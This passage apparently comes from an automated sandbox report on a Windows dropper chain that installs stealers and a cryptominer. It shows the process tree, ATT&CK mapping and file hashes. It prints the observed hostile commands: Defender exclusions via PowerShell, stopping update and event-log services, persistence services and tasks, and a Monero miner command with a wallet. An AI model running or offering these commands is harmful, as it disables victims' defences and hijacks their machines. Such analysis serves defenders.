PID 2264 wrote to memory of 3908	2264	alex.exe	RegAsm.exe
PID 2264 wrote to memory of 3908	2264	alex.exe	RegAsm.exe
PID 2264 wrote to memory of 3908	2264	alex.exe	RegAsm.exe
PID 2264 wrote to memory of 3908	2264	alex.exe	RegAsm.exe
PID 2264 wrote to memory of 3908	2264	alex.exe	RegAsm.exe
PID 2264 wrote to memory of 3908	2264	alex.exe	RegAsm.exe
PID 3908 wrote to memory of 2804	3908	RegAsm.exe	keks.exe
PID 3908 wrote to memory of 2804	3908	RegAsm.exe	keks.exe
PID 3908 wrote to memory of 2804	3908	RegAsm.exe	keks.exe
PID 3096 wrote to memory of 2020	3096	axplons.exe	gold.exe
PID 3096 wrote to memory of 2020	3096	axplons.exe	gold.exe
PID 3096 wrote to memory of 2020	3096	axplons.exe	gold.exe
PID 3908 wrote to memory of 3460	3908	RegAsm.exe	trf.exe
PID 3908 wrote to memory of 3460	3908	RegAsm.exe	trf.exe
PID 2020 wrote to memory of 4596	2020	gold.exe	RegAsm.exe
PID 2020 wrote to memory of 4596	2020	gold.exe	RegAsm.exe
PID 2020 wrote to memory of 4596	2020	gold.exe	RegAsm.exe
PID 2020 wrote to memory of 4852	2020	gold.exe	RegAsm.exe
PID 2020 wrote to memory of 4852	2020	gold.exe	RegAsm.exe
PID 2020 wrote to memory of 4852	2020	gold.exe	RegAsm.exe
PID 2020 wrote to memory of 4988	2020	gold.exe	RegAsm.exe
PID 2020 wrote to memory of 4988	2020	gold.exe	RegAsm.exe
PID 2020 wrote to memory of 4988	2020	gold.exe	RegAsm.exe
PID 2020 wrote to memory of 4988	2020	gold.exe	RegAsm.exe
PID 2020 wrote to memory of 4988	2020	gold.exe	RegAsm.exe
PID 2020 wrote to memory of 4988	2020	gold.exe	RegAsm.exe
PID 2020 wrote to memory of 4988	2020	gold.exe	RegAsm.exe
PID 2020 wrote to memory of 4988	2020	gold.exe	RegAsm.exe
PID 2020 wrote to memory of 4988	2020	gold.exe	RegAsm.exe
PID 3096 wrote to memory of 3168	3096	axplons.exe	redline1.exe
PID 3096 wrote to memory of 3168	3096	axplons.exe	redline1.exe
PID 3096 wrote to memory of 3168	3096	axplons.exe	redline1.exe
PID 3096 wrote to memory of 3504	3096	axplons.exe	install.exe
PID 3096 wrote to memory of 3504	3096	axplons.exe	install.exe
PID 3096 wrote to memory of 3504	3096	axplons.exe	install.exe
PID 3504 wrote to memory of 4656	3504	install.exe	cmd.exe
PID 3504 wrote to memory of 4656	3504	install.exe	cmd.exe
PID 3504 wrote to memory of 4656	3504	install.exe	cmd.exe
PID 4656 wrote to memory of 4108	4656	cmd.exe	sc.exe
PID 4656 wrote to memory of 4108	4656	cmd.exe	sc.exe
PID 4656 wrote to memory of 4108	4656	cmd.exe	sc.exe
PID 4656 wrote to memory of 5052	4656	cmd.exe	NewB.exe
PID 4656 wrote to memory of 5052	4656	cmd.exe	NewB.exe
PID 4656 wrote to memory of 5052	4656	cmd.exe	NewB.exe
PID 4656 wrote to memory of 1924	4656	cmd.exe	sc.exe
PID 4656 wrote to memory of 1924	4656	cmd.exe	sc.exe
PID 4656 wrote to memory of 1924	4656	cmd.exe	sc.exe
PID 4656 wrote to memory of 2216	4656	cmd.exe	GameService.exe
PID 4656 wrote to memory of 2216	4656	cmd.exe	GameService.exe
PID 4656 wrote to memory of 2216	4656	cmd.exe	GameService.exe
PID 4656 wrote to memory of 3792	4656	cmd.exe	GameService.exe
PID 4656 wrote to memory of 3792	4656	cmd.exe	GameService.exe
PID 4656 wrote to memory of 3792	4656	cmd.exe	GameService.exe

C:\Users\Admin\AppData\Local\Temp\4c97db7331d17df48b8701c95a893cc7790dd51450f0da55b8af32fe51ce114c.exe
"C:\Users\Admin\AppData\Local\Temp\4c97db7331d17df48b8701c95a893cc7790dd51450f0da55b8af32fe51ce114c.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1264

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3096

C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
"C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2264

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:2008

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3908

C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2804

C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3460

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
5⤵
PID:1732

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
6⤵
PID:3560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 384
4⤵
- Program crash
PID:1080

C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2020

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:4596

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:4852

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:4988

C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3168

C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
"C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3504

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:4656

C:\Windows\SysWOW64\sc.exe
Sc stop GameServerClient
5⤵
- Launches sc.exe
PID:4108

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameServerClient confirm
5⤵
- Executes dropped EXE
PID:5052

C:\Windows\SysWOW64\sc.exe
Sc delete GameSyncLink
5⤵
- Launches sc.exe
PID:1924

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameSyncLink confirm
5⤵
- Executes dropped EXE
PID:2216

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
5⤵
- Executes dropped EXE
PID:3792

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService start GameSyncLink
5⤵
- Executes dropped EXE
PID:4176

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
4⤵
PID:3868

C:\Windows\SysWOW64\sc.exe
Sc stop GameServerClientC
5⤵
- Launches sc.exe
PID:4712

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameServerClientC confirm
5⤵
- Executes dropped EXE
PID:2704

C:\Windows\SysWOW64\sc.exe
Sc delete PiercingNetLink
5⤵
- Launches sc.exe
PID:4844

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove PiercingNetLink confirm
5⤵
- Executes dropped EXE
PID:2616

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
5⤵
- Executes dropped EXE
PID:4836

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService start PiercingNetLink
5⤵
- Executes dropped EXE
PID:4172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
4⤵
PID:2476

C:\Windows\SysWOW64\sc.exe
Sc delete GameSyncLinks
5⤵
- Launches sc.exe
PID:4008

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameSyncLinks confirm
5⤵
- Executes dropped EXE
PID:2832

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
5⤵
- Executes dropped EXE
PID:4176

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService start GameSyncLinks
5⤵
- Executes dropped EXE
PID:4320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
4⤵
PID:3256

C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
"C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:556

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Checks processor information in registry
PID:236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 236 -s 1144
5⤵
- Program crash
PID:4524

C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
"C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4420

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:4156

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
"C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
3⤵
- Executes dropped EXE
PID:5052

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
4⤵
- Creates scheduled task(s)
PID:2124

C:\Users\Admin\AppData\Local\Temp\1000257001\FirstZ.exe
"C:\Users\Admin\AppData\Local\Temp\1000257001\FirstZ.exe"
4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:744

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
5⤵
PID:4084

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
6⤵
PID:1564

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
5⤵
- Launches sc.exe
PID:2876

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:4544

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
5⤵
- Launches sc.exe
PID:1064

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
5⤵
- Launches sc.exe
PID:2820

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
5⤵
- Launches sc.exe
PID:5064

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3756

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4836

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4188

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2616

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WSNKISKT"
5⤵
- Launches sc.exe
PID:1512

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
5⤵
- Launches sc.exe
PID:2944

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
5⤵
- Launches sc.exe
PID:4220

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WSNKISKT"
5⤵
- Launches sc.exe
PID:2380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2264 -ip 2264
1⤵
PID:396

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:2060

C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
2⤵
- Executes dropped EXE
PID:2924

C:\Windows\Temp\567679.exe
"C:\Windows\Temp\567679.exe" --list-devices
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:760

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:1772

C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
2⤵
- Executes dropped EXE
PID:2808

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:1516

C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1164

C:\Windows\Temp\639191.exe
"C:\Windows\Temp\639191.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3216

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:2616

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5064

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
1⤵
- Executes dropped EXE
PID:4676

C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2740

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
2⤵
PID:3116

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
3⤵
PID:4524

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
2⤵
- Launches sc.exe
PID:2164

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:328

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
2⤵
- Launches sc.exe
PID:776

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
2⤵
- Launches sc.exe
PID:1140

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
2⤵
- Launches sc.exe
PID:4092

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4320

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4788

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4696

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2868

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:248

C:\Windows\explorer.exe
explorer.exe
2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4136

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
1⤵
- Executes dropped EXE
PID:1648

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 236 -ip 236
1⤵
PID:3304

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
1⤵
- Executes dropped EXE
PID:4684

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1140

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\GameSyncLink\GameService.exe
Filesize
288KB

MD5
d9ec6f3a3b2ac7cd5eef07bd86e3efbc

SHA1
e1908caab6f938404af85a7df0f80f877a4d9ee6

SHA256
472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c

SHA512
1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

Download Submit
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
Filesize
2.5MB

MD5
e6943a08bb91fc3086394c7314be367d

SHA1
451d2e171f906fa6c43f8b901cd41b0283d1fa40

SHA256
aafdcfe5386452f4924cfcc23f2cf7eccf3f868947ad7291a77b2eca2af0c873

SHA512
505d3c76988882602f06398e747c4e496ecad9df1b7959069b87c8111c4d9118484f4d6baef5f671466a184c8caec362d635da210fa0987ccb746cbeea218d2a

Download Submit
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
Filesize
6.2MB

MD5
1bacbebf6b237c75dbe5610d2d9e1812

SHA1
3ca5768a9cf04a2c8e157d91d4a1b118668f5cf1

SHA256
c3747b167c70fd52b16fb93a4f815e7a4ee27cf67d2c7d55ea9d1edc7969c67d

SHA512
f6438eced6915890d5d15d853c3ad6856de949b7354dcea97b1cf40d0c8aed767c8e45730e64ab0368f3606da5e95fd1d4db9cc21e613d517f37ddebbd0fa1fe

Download Submit
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
Filesize
13.2MB

MD5
72b396a9053dff4d804e07ee1597d5e3

SHA1
5ec4fefa66771613433c17c11545c6161e1552d5

SHA256
d0b206f0f47a9f8593b6434dc27dadde8480a902e878882fa8c73fc7fe01b11d

SHA512
ad96c9ca2feae7af7fcf01a843d5aa6cbdde0520d68dedff44554a17639c6c66b2301d73daf272708cb76c22eae2d5c89db23af45105c4f0e35f4787f98e192b

Download Submit
C:\Program Files (x86)\GameSyncLink\installc.bat
Filesize
301B

MD5
998ab24316795f67c26aca0f1b38c8ce

SHA1
a2a6dc94e08c086fe27f8c08cb8178e7a64f200d

SHA256
a468b43795f1083fb37b12787c5ff29f8117c26ac35af470084e00c48280442e

SHA512
7c9c2ade898a8defb6510ddd15730bec859d4474071eb6b8e8738ea6089764f81924ad2a6ebf0479d4fed7d61890edaa38f4bfbf70a4e6b30d33aa5bfc5b5c75

Download Submit
C:\Program Files (x86)\GameSyncLink\installg.bat
Filesize
284B

MD5
5dee3cbf941c5dbe36b54690b2a3c240

SHA1
82b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1

SHA256
98370b86626b8fd7a7cac96693348045b081326c49e2421113f49a5ea3588edb

SHA512
9ee431d485e2f09268a22b287b0960859d2f22db8c7e61309a042999c436b3de74f5d75837b739e01122a796ad65bc6468d009ec6ddf4962f4ff288155410556

Download Submit
C:\Program Files (x86)\GameSyncLink\installm.bat
Filesize
218B

MD5
94b87b86dc338b8f0c4e5869496a8a35

SHA1
2584e6496d048068f61ac72f5c08b54ad08627c3

SHA256
2928d8e9a41f39d3802cfd2900d8edeb107666baa942d9c0ffbfd0234b5e5bfc

SHA512
b67eb73fe51d4dba990789f1e0123e902dac6d26569851c3d51ca0a575221ce317f973999d962669016017d8f81a01f11bd977609e66bb1b244334bce2db5d5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
Filesize
2.7MB

MD5
31841361be1f3dc6c2ce7756b490bf0f

SHA1
ff2506641a401ac999f5870769f50b7326f7e4eb

SHA256
222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee

SHA512
53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
Filesize
402KB

MD5
7f981db325bfed412599b12604bd00ab

SHA1
9f8a8fd9df3af3a4111e429b639174229c0c10cd

SHA256
043839a678bed1b10be00842eae413f5ecd1cad7a0eaa384dd80bc1dcd31e69b

SHA512
a5be61416bc60669523e15213098a6d3bb5a2393612b57863fedfa1ff974bc110e0b7e8aadc97d0c9830a80798518616f9edfb65ae22334a362a743b6af3a82d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
Filesize
304KB

MD5
9faf597de46ed64912a01491fe550d33

SHA1
49203277926355afd49393782ae4e01802ad48af

SHA256
0854678d655668c8ebb949c990166e26a4c04aef4ecf0191a95693ca150a9715

SHA512
ef8a7a8566eaf962c4e21d49d9c1583ed2cdc9c2751ce75133a9765d2fa6dc511fc6cc99ea871eb83d50bd08a31cb0b25c03f27b8e6f351861231910a6cf1a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
Filesize
4.2MB

MD5
0f52e5e68fe33694d488bfe7a1a71529

SHA1
11d7005bd72cb3fd46f24917bf3fc5f3203f361f

SHA256
efd29c35766c607aa15d1cb83dec625739791b1616ad37d5b47e78cdb8a42ca8

SHA512
238fbb1c04eef2f2005cb7abf0223e3cd062d9d2840966292e19dcaa495609e134a0bdc35389ae9925ecfc787a13772d3ac7b29058579f702bc849dd0343c400

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
Filesize
1.0MB

MD5
808c0214e53b576530ee5b4592793bb0

SHA1
3fb03784f5dab1e99d5453664bd3169eff495c97

SHA256
434b1a9bd966d204eef1f4cddb7b73a91ebc5aaf4ac9b4ddd999c6444d92eb61

SHA512
2db3b4cb0233230e7c21cd820bde5de00286fbaedd3fe4dcefb6c66fe6867431f0ee1753fc18dcb89b2a18e888bd15d4d2de29b1d5cd93e425e3fcfe508c79c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
Filesize
1.2MB

MD5
56e7d98642cfc9ec438b59022c2d58d7

SHA1
26526f702e584d8c8b629b2db5d282c2125665d7

SHA256
a2aa61942bae116f8c855fda0e9a991dba92b3a1e2f147aee0e7e2be1bdea383

SHA512
0be0b11de472029bd4e2268cddb5ddb381f7f275dfe50c47b9c836980e5cbfa7f71fe78804ef2180ee110ca9cf36944ec8b8b22babb31a1fc7a6585f79932a1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
Filesize
418KB

MD5
0099a99f5ffb3c3ae78af0084136fab3

SHA1
0205a065728a9ec1133e8a372b1e3864df776e8c

SHA256
919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226

SHA512
5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000257001\FirstZ.exe
Filesize
2.5MB

MD5
ffada57f998ed6a72b6ba2f072d2690a

SHA1
6857b5f0c40a1cdb0411eb34aa9fe5029bcdb84f

SHA256
677f393462e24fb6dba1a47b39e674f485450f91deee6076ccbad9fd5e05bd12

SHA512
1de77f83a89935bb3fc3772d5190c3827d76a998785d451e2c0d11a0061cfd28f1b96eccb41b012c76ddda2021e3333a0a647489ae3c6dac10cfb8302abdf33f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd
Filesize
208B

MD5
2dbc71afdfa819995cded3cc0b9e2e2e

SHA1
60e1703c3fd4fe0fba9f1e65e10a61e0e72d9faf

SHA256
5a0070457636d37c11deb3148f6914583148fe45a66f44d7852f007ed5aad0ac

SHA512
0c59fa999ed912e6e747017c4e4c73f37ed7a72654f95eaea3db899308468e8756621db6e4edfd79e456ec69ce2e3e880817410b6aab1d01414f6300240d8b52

Download Submit
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
Filesize
1.8MB

MD5
eb1dfe1fde41dc7565b411d0d6b5e1cd

SHA1
f7ea906ef2769262b7368d552ff76c7de5aeceb6

SHA256
4c97db7331d17df48b8701c95a893cc7790dd51450f0da55b8af32fe51ce114c

SHA512
77967e24be05b52ca23ffdeeab266d395c554194411ef86b9493a8a23d6746fbe9f74b763da7aaa31545a07f9fbfb9f8ee56a9079aecd53e1d03f05e6d43c328

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tmp67F1.tmp
Filesize
2KB

MD5
1420d30f964eac2c85b2ccfe968eebce

SHA1
